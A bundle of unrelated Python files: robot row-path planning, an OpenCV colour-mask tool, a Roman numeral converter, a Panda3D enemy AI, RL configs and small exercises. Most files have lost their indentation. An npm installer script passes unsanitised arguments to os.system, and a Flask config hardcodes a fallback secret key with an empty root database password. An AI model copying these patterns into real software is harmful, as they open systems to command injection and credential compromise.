"""
*********************************************************************
This file is part of:
The Acorn Project
https://www.twistedfields.com/research
*********************************************************************
Copyright (c) 2019-2021 Taylor Alexander, Twisted Fields LLC
Copyright (c) 2021 The Acorn Project contributors (cf. AUTHORS.md).
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*********************************************************************
"""
import redis
import time
import pickle
from scipy.interpolate import CubicSpline
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib.colors as mp_colors
import sys
import utm
import scipy
import geomdl.fitting as fitting
from geomdl.visualization import VisMPL
# import open3d
import math
import random
from scipy.interpolate import splprep, splev
sys.path.append('../vehicle')
from remote_control_process import EnergySegment
import spline_lib
import gps_tools
import matplotlib.path as path
_SMOOTH_MULTIPLIER = 0.00000000001
# r = redis.Redis(
# host='acornserver.local',
# port=6379)
r = redis.Redis(
host='0.0.0.0',
port=6379)
_ROW_POINTS_CUT_OFF = 8
# self.sequence_num = sequence_num
# self.time_stamp = end_gps.time_stamp
# self.start_gps = start_gps
# self.end_gps = end_gps
# self.duration = end_gps.time_stamp - start_gps.time_stamp
# self.distance_sum = distance_sum
# self.meters_per_second = distance_sum / self.duration
# self.watt_seconds_per_meter = total_watt_seconds/distance_sum
# self.height_change = end_gps.height_m - start_gps.height_m
# self.avg_watts = avg_watts
colorlist = ["#0000FF", "#00FF00", "#FF0066"]
idx = 0
orig_x = []
orig_y = []
colors = []
path_cuts = [(0,0), (23,0), (0,48)]
final_path = []
path1 = []
path2 = []
path3 = []
paths = [path1, path2, path3]
print("%%%%%%%%%%%%%%%%%%%%%%%%")
from area import area
_SQUARE_METERS_PER_ACRE = 4046.86
poly_path = None
row_list = {}
for key in r.scan_iter():
#print(key)
if 'gpspolygon' in str(key):
print(key)
polygon = pickle.loads(r.get(key))
print(polygon["geometry"])
polygon_area = area(polygon["geometry"])
print("Polygon is {} acres".format(polygon_area/_SQUARE_METERS_PER_ACRE))
print(polygon["geometry"]["coordinates"][0])
polygon = polygon["geometry"]["coordinates"][0]
poly_path = path.Path(polygon, closed=True)
#print(poly_path)
if "twistedfields:gpspath:autogen_1_row_" in str(key):
row = pickle.loads(r.get(key))
row_list[str(key)] = row
# print(row_list.keys())
rows_in_polygon = []
for row_number in range(len(row_list)):
row_key = "b'twistedfields:gpspath:autogen_1_row_{}:key'".format(row_number+1)
row = row_list[row_key]
#print(row)
row_points_in_polygon = []
for point in row:
if poly_path.contains_point((point["lon"], point["lat"]),radius=0.0):
# print(point)
row_points_in_polygon.append(point)
elif len(row_points_in_polygon) > 0:
if len(row_points_in_polygon) > _ROW_POINTS_CUT_OFF:
rows_in_polygon.append(row_points_in_polygon)
print(len(row_points_in_polygon))
break
# def calculate_distance(point1, point2):
# p1 = np.array([point1[0], point1[1]])
# p2 = np.array([point2[0], point2[1]])
# squared_dist = np.sum((p1-p2)**2, axis=0)
# return(np.sqrt(squared_dist))
#
#
# def calculate_projection(point1, point2, distance):
# """Return a point a given distance past point2."""
# delta_x = utm_points[0][0] - utm_points[1][0]
# delta_y = utm_points[0][1] - utm_points[1][1]
# distance = calculate_distance(utm_points[0], utm_points[1])
# new_x = (projection_distance_meters * delta_x)/distance
# new_y = (projection_distance_meters * delta_y)/distance
# return point2[0] + new_x, point2[1] + new_y
projection_distance_meters = 2.0
print("$")
from remote_control_process import NavigationParameters, PathControlValues, PathSection, Direction
#self.default_navigation_parameters = NavigationParameters(travel_speed=0.0, path_following_direction=Direction.BACKWARD, vehicle_travel_direction=Direction.FORWARD, loop_path=True)
#self.default_navigation_parameters = NavigationParameters(travel_speed=0.0, path_following_direction=Direction.FORWARD, vehicle_travel_direction=Direction.BACKWARD, loop_path=True)
forward_navigation_parameters = NavigationParameters(travel_speed=0.4, path_following_direction=Direction.FORWARD, vehicle_travel_direction=Direction.FORWARD, loop_path=False)
connector_navigation_parameters = NavigationParameters(travel_speed=0.2, path_following_direction=Direction.EITHER, vehicle_travel_direction=Direction.FORWARD, loop_path=False)
#self.default_navigation_parameters = NavigationParameters(travel_speed=0.0, path_following_direction=Direction.FORWARD, vehicle_travel_direction=Direction.FORWARD, loop_path=True)
#self.default_navigation_parameters = NavigationParameters(travel_speed=0.0, path_following_direction=Direction.BACKWARD, vehicle_travel_direction=Direction.BACKWARD, loop_path=True)
_MAXIMUM_ALLOWED_DISTANCE_METERS = 8
_MAXIMUM_ALLOWED_ANGLE_ERROR_DEGREES = 140
# path_control_vals = PathControlValues(angular_p=0.9, lateral_p=-0.25, angular_d=0.3, lateral_d=-0.2)
# turn_control_vals = PathControlValues(angular_p=0.9, lateral_p=-0.25, angular_d=0.3, lateral_d=-0.2)
path_control_vals = PathControlValues(angular_p=0.7, lateral_p=-0.15, angular_d=0.4, lateral_d=-0.1)
turn_control_vals = PathControlValues(angular_p=0.7, lateral_p=-0.15, angular_d=0.4, lateral_d=-0.1)
nav_path = PathSection(points=[],
control_values=path_control_vals,
navigation_parameters=forward_navigation_parameters,
max_dist=_MAXIMUM_ALLOWED_DISTANCE_METERS,
max_angle=_MAXIMUM_ALLOWED_ANGLE_ERROR_DEGREES,
end_dist=1.0,
end_angle=45)
starting_direction = -1
rows_in_polygon = gps_tools.chain_rows(rows_in_polygon, rows_in_polygon[0][0], starting_direction, "three_pt", forward_navigation_parameters, connector_navigation_parameters, turn_control_vals, nav_path, asdict=True)
import copy
interpolate_list = []
row = rows_in_polygon[-1].points
start_points = row[-2], row[-1]
heading = gps_tools.get_heading(start_points[0], start_points[1])
row_aligned_away_pt = gps_tools.project_point(start_points[1], heading, 1.5)
latlon_point1 = gps_tools.project_point(row_aligned_away_pt, heading + 90, 0.5)
latlon_point2 = gps_tools.project_point(row_aligned_away_pt, heading + 90, 1.0)
new_turn = [latlon_point1._asdict(), latlon_point2._asdict()]
interpolate_list.append(latlon_point2._asdict())
turn1_path = copy.deepcopy(nav_path)
turn1_path.points = new_turn
turn1_path.navigation_parameters = connector_navigation_parameters
turn1_path.end_dist=1.0
turn1_path.end_angle=20
turn1_path.control_values = turn_control_vals
rows_in_polygon.append(turn1_path)
row = rows_in_polygon[0].points
start_points = row[1], row[0]
heading = gps_tools.get_heading(start_points[0], start_points[1])
row_aligned_away_pt = gps_tools.project_point(start_points[1], heading, 1.5)
latlon_point1 = gps_tools.project_point(row_aligned_away_pt, heading + -90, 1.0)
latlon_point2 = gps_tools.project_point(row_aligned_away_pt, heading + -90, 0.5)
interpolate_list.append(latlon_point2._asdict())
new_turn = [latlon_point1._asdict(), latlon_point2._asdict()]
turn1_path = copy.deepcopy(nav_path)
turn1_path.points = new_turn
turn1_path.navigation_parameters = connector_navigation_parameters
turn1_path.end_dist=1.0
turn1_path.end_angle=20
turn1_path.control_values = turn_control_vals
# print(interpolate_list)
interpolated_path_points = gps_tools.interpolate_points(interpolate_list, 25)
print(interpolated_path_points)
interpolated_path = copy.deepcopy(nav_path)
interpolated_path.points = interpolated_path_points
interpolated_path.navigation_parameters = forward_navigation_parameters
interpolated_path.end_dist=1.0
interpolated_path.end_angle=20
interpolated_path.control_values = path_control_vals
rows_in_polygon.append(interpolated_path)
rows_in_polygon.append(turn1_path)
row = rows_in_polygon[0].points
start_points = row[0], row[1]
turn1_path = copy.deepcopy(nav_path)
turn1_path.points = start_points
turn1_path.navigation_parameters = connector_navigation_parameters
turn1_path.end_dist=1.0
turn1_path.end_angle=20
turn1_path.control_values = turn_control_vals
rows_in_polygon.append(turn1_path)
# rows_in_polygon = rows_in_polygon[-8:]
r.set('twistedfields:gpspath:aaa_test:key', pickle.dumps(rows_in_polygon))
sys.exit()
min_x = 0
first_x = 0
min_y = 0
first_y = 0
mesh_array = []
colors = [[1,0,0],[0,1,0],[0,0,1]]
count = 0
lat_lon_tracks = []
for track in rows_in_polygon:
if count < len(colors):
row_color = colors[count]
else:
row_color = [random.random(), random.random(), random.random()]
count += 1
track_lat_lon = []
# track = track[3:-4]
for point in track.points:
if len(track.points) == 2:
mesh_box = open3d.geometry.TriangleMesh.create_box(width=0.8, height=0.8, depth=0.8)
else:
mesh_box = open3d.geometry.TriangleMesh.create_box(width=0.7, height=0.7, depth=0.7)
mesh_box.compute_vertex_normals()
mesh_box.paint_uniform_color(row_color)
translation = [point["lat"]* 100000 - 3735387, point["lon"] * 100000 + 12233156, 0]
print(translation)
#print("{} {}".format(point["lat"] + min_x + first_x, point["lon"] + min_y + first_y))
#latlon_point = utm.to_latlon(point["lat"] + min_x + first_x, point["lon"] + min_y + first_y, ut_zone[0], ut_zone[1])
#print(latlon_point)
#track_lat_lon.append(latlon_point)
mesh_box.translate(translation)
mesh_array.append(mesh_box)
#lat_lon_tracks.append(track_lat_lon)
pcd = open3d.geometry.PointCloud()
# np_points = np.random.rand(100, 3)
# print(np.array(point_cloud))
# From numpy to Open3D
# pcd.points = open3d.utility.Vector3dVector(gps_mesh.pcd)
# # pcd.points = open3d.utility.Vector3dVector(gps_mesh.slice_points)
#
mesh_frame = open3d.geometry.TriangleMesh.create_coordinate_frame(
size=10, origin=[0, 0, 0])
#
# mesh_array.append(pcd)
mesh_array.append(mesh_frame)
open3d.visualization.draw_geometries(mesh_array)
|
import cv2
import numpy as np
camera = cv2.VideoCapture("2.mp4")  # read the video from a file
def nothing(x):
    pass
cv2.namedWindow("frame")
cv2.createTrackbar("H1","frame",0,180,nothing)  # create the HSV range trackbars
cv2.createTrackbar("H2","frame",0,180,nothing)
cv2.createTrackbar("S1","frame",0,255,nothing)
cv2.createTrackbar("S2","frame",0,255,nothing)
cv2.createTrackbar("V1","frame",0,255,nothing)
cv2.createTrackbar("V2","frame",0,255,nothing)
while camera.isOpened():  # while the capture is open
    ret,frame = camera.read()
    if not ret:  # stop at the end of the video
        break
    hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)  # convert BGR to HSV
    H1 = cv2.getTrackbarPos("H1","frame")  # read the trackbar positions
    H2 = cv2.getTrackbarPos("H2","frame")
    S1 = cv2.getTrackbarPos("S1","frame")
    S2 = cv2.getTrackbarPos("S2","frame")
    V1 = cv2.getTrackbarPos("V1","frame")
    V2 = cv2.getTrackbarPos("V2","frame")
    lower = np.array([H1,S1,V1])  # lower colour bound in HSV
    upper = np.array([H2,S2,V2])  # upper colour bound in HSV
    mask = cv2.inRange(hsv,lower,upper)  # build the mask
    res = cv2.bitwise_and(frame,frame,mask=mask)
    cv2.imshow("frame",frame)  # show the original frame
    cv2.imshow("hsv",hsv)  # show the HSV image
    cv2.imshow("mask",mask)  # show the mask
    cv2.imshow("res",res)  # show which colours pass the mask
    if cv2.waitKey(25) & 0xFF == ord("q"):  # quit when 'q' is pressed
        break
camera.release()
cv2.destroyAllWindows()  # close all windows
|
'''Convert to and from Roman numerals
This program is part of 'Dive Into Python 3', a free Python book for
experienced programmers. Visit http://diveintopython3.org/ for the
latest version.
'''
roman_numeral_map = (('M', 1000),
('CM', 900),
('D', 500),
('CD', 400),
('C', 100),
('XC', 90),
('L', 50),
('XL', 40),
('X', 10),
('IX', 9),
('V', 5),
('IV', 4),
('I', 1))
def to_roman(n):
'''convert integer to Roman numeral'''
if not (0 < n < 4000):
raise OutOfRangeError('number out of range (must be 1...3999)')
result = ''
for numeral, integer in roman_numeral_map:
while n >= integer:
result += numeral
n -= integer
return result
class OutOfRangeError(ValueError):
pass
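# The module docstring above promises conversion both to and from Roman numerals,
# but only to_roman() appears in this excerpt. A minimal from_roman() sketch
# (illustrative, without the book's input validation) can reuse the same table:
def from_roman(s):
    '''convert Roman numeral to integer (minimal sketch, no validation)'''
    result = 0
    index = 0
    for numeral, integer in roman_numeral_map:
        while s[index:index + len(numeral)] == numeral:
            result += integer
            index += len(numeral)
    return result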
# Copyright (c) 2009, Mark Pilgrim, All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
|
#!/usr/local/bin/python3
# -*- coding: utf-8 -*-
import os
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
# Base configuration class
class Config:
    # secret key
    SECRET_KEY = os.environ.get('SECRET_KEY') or '4329581751'
    # database configuration
    SQLALCHEMY_TRACK_MODIFICATIONS = False
    MYSQL_USER = 'root'
    MYSQL_PASS = ''
    SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://{mysql_user}:{mysql_pass}@localhost/staffms'.format(
        mysql_user=MYSQL_USER, mysql_pass=MYSQL_PASS)
    # Redis configuration
    REDIS_CONFIG = {
        'CACHE_TYPE': 'redis',
        'CACHE_REDIS_HOST': '127.0.0.1',
        'CACHE_REDIS_PORT': 6379,
        'CACHE_REDIS_DB': '',
        'CACHE_REDIS_PASSWORD': ''
    }
    # mail configuration
    MAIL_SERVER = 'smtp.animekid.cn'
    MAIL_USERNAME = ''
    MAIL_PASSWORD = ''
    # extra initialization hook
    @staticmethod
    def init_app(app):
        pass
|
from sys import stdin
N = int(stdin.readline().strip())
for i in range(0, N):
r, e, c = [float(x) for x in input().split()]
incwith = e - c
incwithout = r
if incwithout == incwith:
print("does not matter")
if incwithout > incwith:
print("do not advertise")
if incwithout < incwith:
print("advertise")
|
# The problem is here:
# https://www.hackerrank.com/challenges/30-regex-patterns
# This was particularly enjoyable for me because it was my first attempt
# at using regex
#!/bin/python
import sys
import re
N = int(raw_input().strip())
names = []
for a0 in range(N):
firstName,emailID = raw_input().strip().split(' ')
firstName,emailID = [str(firstName),str(emailID)]
    obj = re.search(r'.*@gmail\.com$', emailID)  # escape the dot so it matches a literal '.'
if obj:
names.append(firstName)
names = sorted(names)
for name in names:
print name
|
from pandac.PandaModules import * #basic Panda modules
from direct.showbase.DirectObject import DirectObject #event handling
from panda3d.ai import * #panda AI
from direct.actor.Actor import Actor
import math, time
class Enemy(object):
def __init__(self, parent, spawnPos, AIpath):
self.speed = 0.4
self.sightBlocked = False
self.foundPlayer = False
self.foundPlayerTime = -1
self.spawnPos = spawnPos
self.spawnH = 0
self.parent = parent
self.startH = -1
self.blocked = False
self.justUnblocked = False
self.timeUnblocked = -1
self.initEnemy()
self.initSounds()
self.initAI(AIpath)
    #Loads the enemy model and starts its walk animation
def initEnemy(self):
self.enemyNode = Actor('Models/monster', {'walk':'Models/monsterWalkAnim',
'run':'Models/monsterRunAnim'})
self.enemyNode.reparentTo(render)
self.enemyNode.setScale(0.33)
self.enemyNode.setPos(self.spawnPos)
self.enemyNode.setPlayRate(1.2, 'walk')
self.enemyNode.loop('walk')
def initSounds(self):
self.stompSfx = base.loadSfx('sounds/stomp.ogg')
self.stompSfx.setLoopCount(0)
self.stompSfx.setVolume(.15)
#self.chaseSfx = base.loadSfx('Sounds/chase.wav')
#self.chaseSfx.setLoopCount(0)
self.movementSfx = None
#AIpath is a list of vertices
def initAI(self, AIpath):
self.AIworld = AIWorld(render)
self.AIchar = AICharacter('enemyNode',self.enemyNode, 100, 10, 27)
self.AIworld.addAiChar(self.AIchar)
self.AIbehaviors = self.AIchar.getAiBehaviors()
        #Path follow (note the order is reversed)
self.AIbehaviors.pathFollow(1.0)
for point in AIpath:
self.AIbehaviors.addToPath(point)
self.AIbehaviors.startFollow()
def respawn(self):
self.enemyNode.setPos(self.spawnPos)
self.enemyNode.setH(self.spawnH)
self.foundPlayer = False
def initCollisions(self, player):
envMask = BitMask32(0x1)
sightMask = BitMask32(0x2)
deathMask = BitMask32(0x4)
clearSightMask = BitMask32(0x8)
#collides with walls
cSphere = CollisionSphere( (0,0,20), 10)
cNode = CollisionNode('enemyPusher')
cNode.addSolid(cSphere)
cNode.setCollideMask(BitMask32.allOff())
cNode.setFromCollideMask(envMask)
cNodePath = self.enemyNode.attachNewNode(cNode)
base.pusher.addCollider(cNodePath, self.enemyNode)
base.cTrav.addCollider(cNodePath, base.pusher)
#cNodePath.show()
#collides with the player
cSphere = CollisionSphere( (0,0,20), 20 )
cNode = CollisionNode('enemy')
cNode.addSolid(cSphere)
cNode.setCollideMask(BitMask32.allOff())
cNode.setFromCollideMask(deathMask)
cNodePath = self.enemyNode.attachNewNode(cNode)
base.cTrav.addCollider(cNodePath, base.cHandler)
#cNodePath.show()
        #collides with the player to determine if the player is in the enemy's cone of vision
cTube = CollisionTube (0,-15,0,0,-60,0, 40)
cNode = CollisionNode('vision')
cNode.addSolid(cTube)
cNode.setCollideMask(BitMask32.allOff())
cNode.setIntoCollideMask(sightMask)
cNodePath = self.enemyNode.attachNewNode(cNode)
#cNodePath.show()
        #checks to see if there is anything blocking the enemy's line of sight to the player
self.queue = CollisionHandlerQueue()
cRay = CollisionRay(self.enemyNode.getX(), self.enemyNode.getY(), self.enemyNode.getZ() + 5, self.enemyNode.getX() - player.playerNode.getX(), self.enemyNode.getY() - player.playerNode.getY(), self.enemyNode.getZ() - player.playerNode.getZ())
self.cNode = CollisionNode('sight')
self.cNode.addSolid(cRay)
self.cNode.setCollideMask(BitMask32.allOff())
self.cNode.setFromCollideMask(envMask|clearSightMask)
cNodePath = base.render.attachNewNode(self.cNode)
base.cTrav.addCollider(cNodePath, self.queue)
#cNodePath.show()
#checks to see if it is blocked by a wall while patrolling
self.wallQueue = CollisionHandlerQueue()
cRay = CollisionRay(2, 0, 10, 0, -1, 0)
cNode = CollisionNode('wallSight')
cNode.addSolid(cRay)
cNode.setCollideMask(BitMask32.allOff())
cNode.setFromCollideMask(envMask|clearSightMask)
cNodePath = self.enemyNode.attachNewNode(cNode)
base.cTrav.addCollider(cNodePath, self.wallQueue)
#cNodePath.show()
base.accept('playerSight-again-vision', self.inSight)
def inSight(self, cEntry):
if not self.foundPlayer and not self.sightBlocked:
self.foundPlayer = True
self.foundPlayerTime = time.time()
#self.enemyNode.loop('run')
def update(self, dt, player):
if player.newLevel:
return
try:
self.cNode
except AttributeError:
print("enemy cnode not defined")
return
if self.AIchar.getVelocity() == LVecBase3f(0, 0, 0):
self.AIbehaviors.startFollow()
        #updates the enemy's vision ray towards the player
self.cNode.modifySolid(0).setOrigin(LPoint3f (self.enemyNode.getX(), self.enemyNode.getY(), self.enemyNode.getZ() + 5))
self.cNode.modifySolid(0).setDirection(LVector3f ((self.enemyNode.getX() - player.playerNode.getX()) * -1, (self.enemyNode.getY() - player.playerNode.getY()) * -1, 0))
self.wallQueue.sortEntries()
wallSearch = True
wallSearchIndex = 0
while wallSearch == True:
if self.wallQueue.getNumEntries() > 0 and wallSearchIndex < self.wallQueue.getNumEntries():
entry = self.wallQueue.getEntry(wallSearchIndex)
type = entry.getIntoNode().getName()
if type == 'start' or type == 'exit' or ('enemy' in type and type != 'enemyPusher') or 'world' in type:
wallSearchIndex = wallSearchIndex + 1
continue
wallSearch = False
if type == 'Wall':
if self.blocked == False:
self.startH = self.enemyNode.getH()
self.blocked = True
elif 'pCube' not in type:
self.blocked = False
self.justUnblocked = True
self.timeUnblocked = time.time()
else:
wallSearch = False
if self.blocked == True:
self.blocked = False
self.justUnblocked = True
self.timeUnblocked = time.time()
        #checks the first object along the enemy's line of sight to the player
        #if the first object it sees is not the player then it doesn't chase towards it
self.queue.sortEntries()
sightSearch = True
sightSearchIndex = 0
while sightSearch == True:
if self.queue.getNumEntries() > 0 and sightSearchIndex < self.queue.getNumEntries():
entry = self.queue.getEntry(sightSearchIndex)
type = entry.getIntoNode().getName()
if type == 'start' or type == 'exit' or ('enemy' in type and type != 'enemyPusher') or 'world' in type:
sightSearchIndex = sightSearchIndex + 1
continue
sightSearch = False
if type == 'playerSight':
self.sightBlocked = False
elif 'pCube' not in type:
self.sightBlocked = True
else:
sightSearch = False
#if the player is found then moves towards them
#otherwise continues patrolling
if self.foundPlayer:
self.move(dt, player)
self.parent.chaseBGM(True)
else:
self.parent.chaseBGM(False)
if self.blocked == True:
self.enemyNode.setH(self.enemyNode.getH() - 15)
elif self.justUnblocked == True:
if self.timeUnblocked + 3.0 < time.time():
self.justUnblocked = False
self.timeUnblocked = -1
else:
x_adjustment = 1
y_adjustment = 1
measure_against = self.startH % 360
if self.enemyNode.getH() < 0:
measure_against = 360 - measure_against
if measure_against >=0 and measure_against < 90:
x_adjustment = 1
y_adjustment = -1
if measure_against >=90 and measure_against < 180:
x_adjustment = 1
y_adjustment = 1
if measure_against >= 180 and measure_against < 270:
x_adjustment = -1
y_adjustment = 1
if measure_against >= 270 and measure_against < 360:
x_adjustment = -1
y_adjustment = -1
angle = self.startH - self.enemyNode.getH()
self.enemyNode.setX(self.enemyNode.getX() + x_adjustment * math.fabs(math.sin(math.radians(angle))) * self.speed)
self.enemyNode.setY(self.enemyNode.getY() + y_adjustment * math.fabs(math.cos(math.radians(angle))) * self.speed)
else:
self.AIworld.update()
if time.time() > self.foundPlayerTime + 5:
self.foundPlayer = False
#Movement SFX
#if self.foundPlayer and self.movementSfx != self.chaseSfx:
# if self.movementSfx != None:
# self.movementSfx.stop()
# self.movementSfx = self.chaseSfx
# self.movementSfx.play()
#if not self.foundPlayer and self.movementSfx != self.stompSfx:
if self.movementSfx != self.stompSfx:
if self.movementSfx != None:
self.movementSfx.stop()
self.movementSfx = self.stompSfx
self.movementSfx.play()
    #Moves the enemy towards the player
def move(self, dt, player):
hypotenuse = math.sqrt( (player.playerNode.getX() - self.enemyNode.getX())**2 + (player.playerNode.getY() - self.enemyNode.getY())**2 )
my_cos = (player.playerNode.getX() - self.enemyNode.getX()) / hypotenuse
my_sin = (player.playerNode.getY() - self.enemyNode.getY()) / hypotenuse
self.enemyNode.setPos(self.enemyNode.getX() + my_cos * self.speed, self.enemyNode.getY() + my_sin * self.speed, self.enemyNode.getZ())
self.enemyNode.lookAt(player.playerNode.getX(), player.playerNode.getY(), self.enemyNode.getZ())
self.enemyNode.setH(self.enemyNode.getH() - 180)
#if the enemy is near enough to the player, it will keep looking
if hypotenuse < 5.0 and self.sightBlocked == False:
self.foundPlayerTime = time.time()
self.foundPlayer = True
|
# Exercise 5.2 - Book
i = 50
while i <= 100:
print(f'Número {i}')
i += 1
|
# Task3
import time
from inspect import signature
import numpy as np
import inspect
class decorator3:
def __init__(self,fun):
self.fun= fun
decorator3.fun1 = fun
decorator3.source = inspect.getsource(fun)
self.arguments= []
decorator3.count= 0
self.exe_time = 0
def __call__(self,*args):
        decorator3.count += 1
        # time a single call and keep its result
        start_time = time.time()
        self.output = self.fun(*args)
        self.exe_time = time.time() - start_time
res = ' ' + str(decorator3.fun1.__name__) + ' ' + 'call:' + ' ' + str(self.count) + ' ' + 'executed in' + ' ' + str(format(self.exe_time, '.8f')) + ' ' + 'sec' + '\n'
self.docstring = decorator3.fun1.__doc__
self.type1 = type(self.fun)
self.name = self.fun.__name__
self.key =[]
self.value =[]
self.signature = inspect.signature(self.fun)
self.Keyworded = {
k: v.default
for k, v in self.signature.parameters.items()
if v.default is not inspect.Parameter.empty
}
self.positional = [
k
for k, v in self.signature.parameters.items()
if v.default is inspect.Parameter.empty
]
res += 'Name:' + '\t' + str(self.name) + '\n'
res += 'Type:' + '\t' + str(self.type1) + '\n'
res += 'Sign:' + '\t' + str(self.signature) + '\n'
res += 'Args:' + '\t' + 'positional' + str(self.positional) + '\n'
res += ' ' + '\t' + 'Key=worded' + str(self.Keyworded) + '\n'
res += 'Docs:' + '\t' + str(self.docstring) + '\n'
res += 'Source:'+ '\t' + decorator3.source + '\n'
res += 'Output:' + '\t' + str(self.output)
with open('Dumped.txt', 'w') as dump:
dump.write(res)
with open('Dumped.txt', 'r') as dump1:
read = dump1.read()
print(read)
return self.exe_time
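# Illustrative usage sketch (the decorated function below is made up, not part of
# the original task): applying the decorator and calling the function once writes
# the introspection report to Dumped.txt, prints it, and returns the call time.
@decorator3
def add(a, b=1):
    """Return the sum of a and b."""
    return a + b

if __name__ == '__main__':
    elapsed = add(2, 3)
    print('call took', elapsed, 'seconds')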
|
import numpy as np
import tensorflow as tf
from tensorflow.contrib.slim import fully_connected
from tensorflow.python.ops.rnn_cell_impl import _RNNCell as RNNCell
import sys
from dps import cfg
from dps.config import DEFAULT_CONFIG
from dps.train import training_loop
from dps.env.room import Room
from dps.rl import RLUpdater
from dps.rl.value import (
PolicyEvaluation, ProximalPolicyEvaluation, TrustRegionPolicyEvaluation,
NeuralValueEstimator)
from dps.rl.policy import Policy, Deterministic
from dps.utils.tf import FeedforwardCell
def build_env():
return Room()
class GoToPoint(RNNCell):
def __init__(self, point=None):
if point is None:
point = (0, 0)
self.point = np.array(point).reshape(1, -1)
def __call__(self, inp, state, scope=None):
with tf.name_scope(scope or 'go_to_point'):
batch_size = tf.shape(inp)[0]
return (self.point - inp[:, :2]), tf.fill((batch_size, 1), 0.0)
@property
def state_size(self):
return 1
@property
def output_size(self):
return 2
def zero_state(self, batch_size, dtype):
return tf.fill((batch_size, 1), 0.0)
def get_updater(env):
policy = Policy(GoToPoint(), Deterministic(2), env.obs_shape)
# controller = FeedforwardCell(lambda inp, output_size: MLP([128, 128])(inp, output_size), 1)
controller = FeedforwardCell(lambda inp, output_size: fully_connected(inp, output_size, activation_fn=None), 1)
estimator = NeuralValueEstimator(controller, env.obs_shape)
alg = cfg.alg_class(estimator, name="critic")
updater = RLUpdater(env, policy, alg)
return updater
config = DEFAULT_CONFIG.copy(
get_updater=get_updater,
build_env=build_env,
log_name="policy_evaluation",
max_steps=100000,
display_step=100,
T=3,
reward_radius=0.2,
max_step=0.1,
restart_prob=0.0,
l2l=False,
n_val=200,
threshold=1e-4,
verbose=False,
)
x = int(sys.argv[1])
if x == 0:
print("TRPE")
config.update(
name="TRPE",
delta_schedule='0.01',
max_cg_steps=10,
max_line_search_steps=10,
alg_class=TrustRegionPolicyEvaluation
)
elif x == 1:
print("PPE")
config.update(
name="PPE",
optimizer_spec="rmsprop",
lr_schedule="1e-2",
epsilon=0.2,
opt_steps_per_update=100,
S=1,
alg_class=ProximalPolicyEvaluation
)
else:
print("PE")
config.update(
name="PolicyEvaluation",
optimizer_spec='rmsprop',
lr_schedule='1e-5',
opt_steps_per_update=100,
alg_class=PolicyEvaluation
)
with config:
cfg.update_from_command_line()
training_loop()
|
def singlenum(nums):
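    # The stub above had no body; below is a minimal hedged sketch assuming the
    # usual "single number" problem (every element appears twice except one).
    result = 0
    for num in nums:
        result ^= num  # XOR cancels the paired elements, leaving the unique one
    return result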
|
import sys
import json
import os
path=sys.argv[1]
libname=sys.argv[2]
print(path)
f=open(path,'r')
jf=json.loads(f.read())
os.system('mkdir libs')
os.system('mkdir libs/' + libname)
versions=jf['versions']
print(versions)
print('=====================')
for v in versions:
print('Installing ' + libname + ' ' + v)
os.system('mkdir libs/' + libname + '/' + v)
cmd='npm install ' + libname + '@' + v + ''
print(cmd)
os.system(cmd)
os.system('mv node_modules/' + libname + '/*' + ' libs/' + libname + '/' + v + '/')
os.system('rm -rf node_modules/')
print('The lib has been installed. Now importing lib info to DB')
|
from Deck import *
from Player import *
class Util:
@staticmethod
def moveListOrder(listv):
if(type(listv) == list and listv!=[]):
listv = listv[1:]+[listv[0]]
return listv
@staticmethod
def chooseDirection(playerNameList,dir=True):
if(len(playerNameList)>2 and dir == False):
temp = playerNameList[1:]
temp.reverse()
playerNameList=[playerNameList[0]]+temp
return playerNameList
else:
return playerNameList
@staticmethod
def distributeCardToPlayers(players,deck):
deck.shuffle()
idx = 0
playercount = len(players)
while(deck!=[]):
idx %=playercount
players[idx].importCard(deck[0])
idx += 1
deck = deck[1:]
return players
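# Illustrative usage sketch (assumes the Deck and Player modules imported above
# are available); the two helpers below are plain static methods, so they can be
# exercised without building a full game.
if __name__ == '__main__':
    print(Util.moveListOrder([1, 2, 3, 4]))                   # [2, 3, 4, 1]
    print(Util.chooseDirection(['a', 'b', 'c'], dir=False))   # ['a', 'c', 'b']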
|
# -*- coding: utf-8 -*-
"""
Advanced String Analysis Methods
contains the following functions:
- Wordstemm Cluster : wordstemm_clusters
... clusters lines of text into wordstemm items, groups and one-hot encodes
them, and returns a filtered dataframe with the original data plus the
corresponding wordstemms and one-hot encodings, and one dataframe with just
the string lines falling into each corresponding wordstemm.
-...
Created on Thu Mar 14 10:43:34 2019
@author: Markus.Meister
"""
#%% -- imports --
import pandas as pd
import numpy as np
from scii_funs import *
from df_funs import write_df_to_excel, eval_value_dfs, dict_to_df, mean_values_df
#%% -- globals --
w_words_ = np.array([
"wer ",
"wem ",
"wen ",
"wessen ",
"wie ",
"wann ",
